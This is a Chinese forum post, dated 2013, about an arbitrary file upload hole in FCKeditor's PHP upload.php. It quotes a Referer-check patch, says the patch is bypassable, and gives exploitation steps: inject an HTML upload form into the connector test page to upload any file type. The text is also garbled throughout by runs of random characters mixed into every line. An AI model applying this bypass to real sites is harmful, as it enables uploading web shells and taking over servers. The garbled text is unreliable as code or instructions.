漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php
" [! T, k; W1 ]/ c$ Z+ Y9 U, n+ U网上给出的修复方案是/ Z' `5 u# t. t2 z
修复方法,删除FCK编辑器用其他的编辑器' V" a. F2 C, K$ j* d% O9 d
或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件
# o5 L. j6 q1 X在. Y+ t/ K4 f/ V4 ?+ F' T
require(‘config.php’); E' y6 \# U/ T+ f4 n
require(‘util.php’); R2 g. L* ?. d3 [7 L
的下面添加以下代码—————————–
8 b, t7 w; P, D4 H! N5 p1 J//防止外部提交
2 _' @1 V9 [6 Q0 \function outsidepost()
: \. l: V$ z9 T6 D1 ^( l: \- A$ J8 H x{8 X! W+ h" N9 ]" }* n" x6 W
$servername=$_SERVER['SERVER_NAME'];
3 z, [6 M2 L" _; B0 D+ ^9 O$sub_from=@$_SERVER['HTTP_REFERER'];
! j/ N, M& \0 x( y, X8 }2 N e* s1 b9 Q$sub_len=strlen($servername);
/ f2 A- K7 b8 b1 z# h$checkfrom=substr($sub_from,7,$sub_len);7 O" l) d+ K: d
if($checkfrom!=$servername){$ N9 `' E @- {( I6 u
echo(“you don’t outsidepost!”);0 x6 M% r+ E# X( J
exit;
3 s8 Z) s/ S. q7 D) E}3 j2 N4 Z# @% G) z; \1 u5 P$ W) B
}
/ R8 Q- p5 D( l7 \outsidepost();6 t1 n. H5 Y3 r
防止外部提交,但是没有防止内部提交," M: _* l$ r( z7 A
利用方法:
5 {0 ]& v8 O- y1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html8 v+ b' y! c7 G
2,在Current Folder 框输入
0 K$ {4 s5 S; U7 g' ]* d. @8 [<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>% g; [1 p& U: N
然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。
# s- a& S! j" v9 h- U1 w6 n& ]PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |
发表于 2013-1-11 21:12:44
收藏
支持
反对